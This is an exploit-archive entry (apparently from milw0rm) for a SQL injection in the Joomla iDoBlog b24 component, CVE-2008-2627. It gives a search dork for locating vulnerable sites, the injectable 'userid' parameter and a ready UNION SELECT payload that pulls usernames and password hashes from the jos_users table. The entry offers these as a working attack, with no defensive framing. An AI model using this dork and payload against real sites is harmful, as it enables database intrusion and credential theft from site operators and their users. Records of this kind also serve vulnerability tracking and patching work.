[] NeoSense

Joomla! Component iDoBlog b24 - SQL Injection

Author: His0k4
type: webapps
platform: php
port: 
date_added: 2008-06-02 
date_updated:  
verified: 1 
codes: OSVDB-45962;CVE-2008-2627 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################
#							#
#    Joomla Component idoblog Remote SQL Injection	#
#							#
#########################################################

########################################

[*] Founded by : His0k4 (Algerian HaCkeR);
[*] Contact:     His0k4.hlm[at]gmail.com
[*] Greetz :     All friends & muslims HaCkeRs  :)
[*] Greetz2 :    http://www.palcastle.org/cc/

########################################

[*] Script_Name: "Joomla"
[*] Component_Name: "com_idoblog"

########################################

[*] DORK: inurl:com_idoblog

########################################

[*] P.O.C : /index.php?option=com_idoblog&task=userblog&userid={SQL}
[*] Example: /index.php?option=com_idoblog&task=userblog&userid=<valid_userid> and 1=1 UNION SELECT user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

########################################

# milw0rm.com [2008-06-03]